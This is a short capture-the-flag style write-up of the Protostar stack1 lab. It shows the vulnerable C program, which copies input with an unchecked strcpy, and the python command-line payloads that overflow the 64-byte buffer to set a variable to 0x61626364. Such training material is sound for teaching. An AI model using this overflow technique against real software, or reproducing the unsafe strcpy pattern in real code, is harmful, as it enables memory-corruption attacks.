Protostar - stack1

This is my second post on the Protostar series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

Additionally, we check out the stack1.c source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);

Okay, looking at the code, we need to fill the buffer and modify the variable "modified" to represent the value 0x61626364.

To accomplish this, we first need to overflow the buffer with 64 bytes:

$ ./stack1 $(python -c 'print "A" * 64')
Try again, you got 0x00000000
$ ./stack1 $(python -c 'print "A" * 65')
Try again, you got 0x00000041

We notice that after sending 65 bytes, we start to fill our response. It looks like 64 is our buffer, but everything beyond will fill up our response.

Let's test another theory by adding the letter B 4 more times after our 64 bytes:

$ ./stack1 $(python -c 'print "A" * 64 + "B" * 4')
Try again, you got 0x42424242

Excellent! Now we need to thoroughly understand what is asked for us in this program.

After filling our modified variable (buffer) past 64, we start to fill up its value. Currently, its value is 42424242. However, we need to have it read 0x61626364. Since we are already told this is in little endian, we will need to read its notation in reverse. It will actually read \x64\x63\x62\x61.

Let's update our payload:

$ ./stack1 $(python -c 'print "A" * 64 + "\x64\x63\x62\x61"')
you have correctly got the variable to the right value


Thanks for reading.